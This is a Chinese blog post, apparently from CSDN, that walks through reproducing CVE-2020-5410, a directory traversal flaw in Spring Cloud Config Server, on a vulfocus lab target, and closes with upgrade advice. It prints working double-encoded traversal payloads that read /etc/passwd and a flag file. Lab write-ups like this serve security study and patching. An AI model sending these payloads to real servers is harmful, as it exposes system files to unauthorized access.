Spring 目录遍历 (CVE-2020-5410 )复现

最新推荐文章于 2023-05-27 00:48:42 发布
最新推荐文章于 2023-05-27 00:48:42 发布
阅读量956 收藏 4
点赞数 1
分类专栏: 漏洞复现 文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YouthBelief/article/details/121114405
版权

Spring 目录遍历 (CVE-2020-5410 )


所有文章,仅供安全研究与学习之用,后果自负!

Spring 目录遍历 (CVE-2020-5410 )

0x01 漏洞描述

Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。

8888端口

0x02 影响范围

Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本

0x03 漏洞复现

vulfocus靶场
靶场首页
在这里插入图片描述
%252F 两次url解码为 /

payload:

/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..	%252Ftmp%23foo/development

访问下面url获取flag
http://118.193.36.37:61078/…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252Ftmp%23foo/development

在这里插入图片描述
etc/passwd

/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development

在这里插入图片描述

0x04 漏洞修复

升级到 Spring Cloud Config 至2.2.3版本或2.1.9版本,并且将Spring-Cloud-Config-Server服务放置在内网中,同时使用Spring Security进行身份验证。最新版本下载地址为:https://github.com/spring-cloud/spring-cloud-config/releases

LuckyCharm~
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[Vulfocus解题系列] Spring 目录遍历CVE-2020-5410
00勇士王子的博客
07-13 2454
漏洞介绍 名称: Spring 目录遍历CVE-2020-5410 ) 描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可
【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410
10-15 1318
spring-目录遍历
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410复现
Brucetg的博客
06-15 4961
Spring Cloud Config Spring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.1.0 to 2.1.8 复现过程 https://github.com/spring-cloud/spring-cloud-config/releas
Spring 目录遍历(CVE-2020-5410)
weixin_46801402的博客
11-02 486
Spring 目录遍历(CVE-2020-5410)
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
yzl_007的博客
08-08 2093
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现 漏洞介绍 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.
Spring 目录遍历 (CVE-2020-5410)~vulfocus/spring-cve_2020_5410:latest
qq_34341458的博客
04-11 4028
0x01 描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 0x02 靶场地址 靶场地址:http://v
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告
爱国小白帽
06-03 2353
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
sharingIsCaring:TwonkyMedia服务器7.0.11-8.5目录遍历CVE-2018-7171
05-15
(和更多) CVE-2018-7171代表TwonkyMedia Server版本7.0.11-8.5(最新版本)中的目录/文件遍历漏洞。 利用此漏洞,攻击者可以列出独立运行TwonkyMedia Server平台的设备上的所有文件。 此外,攻击者可以利用此漏洞...
文件目录遍历程序
12-28
一个简单的使用VC编写关于文件目录遍历小程序,供学习参考
实例226——实现遍历目录下的每个文件
05-27
实例226——实现遍历目录下的每个文件,保证可用。
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
Vulfocus-Spring 目录遍历CVE-2020-5410
qq_41819939的博客
07-29 494
SpringCloudConfig是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本。...
GitLab 目录遍历漏洞复现(CVE-2023-2825)
最新发布
0xSec
05-27 3710
GitLab 存在目录遍历漏洞,当嵌套在至少五个组中的公共项目中存在附件时,未经身份验证的恶意用户可以利用该漏洞读取服务器上的任意文件。
linux下docker 进行nginx目录遍历漏洞复现
jiet07的博客
01-29 646
文章目录漏洞描述环境搭建步骤一:linux下安装docker步骤二:搜索nginx镜像拉nginx镜像运行docker并检测nginx环境漏洞复现步骤一:添加autoindex on;步骤二:在nginx服务器路径下创建文件夹并用浏览器访问步骤三:修改配置文件并复现漏洞总结:参考连接 漏洞描述 Nginx的目录遍历漏洞与Apache的一样,都是配置方面的问题。默认配置的话是不会开启目录遍历的。...
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
mkdocs是一款流行的静态网站生成器,它可以将Markdown格式的文档转换成HTML网页。不幸的是,mkdocs的1.2.2版本存在一个漏洞(CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞来读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,导致攻击者可以在请求参数中注入恶意内容。 为了利用这个漏洞,攻击者需要发送一个带有特定参数的HTTP请求。参数中包含了“../”这个字符串,意味着攻击者可以访问服务器上根目录之外的文件。通过不断利用目录遍历漏洞,攻击者可以找到并读取服务器上的敏感文件,例如配置文件、密码文件等。这个漏洞对于那些使用mkdocs作为网站生成器并使用内置开发服务器的用户来说,非常严重,因为攻击者可以轻易地获取到他们的网站源码和其他敏感信息。 为了避免这个漏洞,用户可以升级到mkdocs的最新版本,或者使用其他的静态网站生成器。此外,也可以使用专门的Web服务器来代替mkdocs内置的开发服务器。在配置Web服务器时,用户应该注意避免目录遍历漏洞和其他网络安全问题。通过正确地配置Web服务器,用户可以增强他们网站的安全性,并避免潜在的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值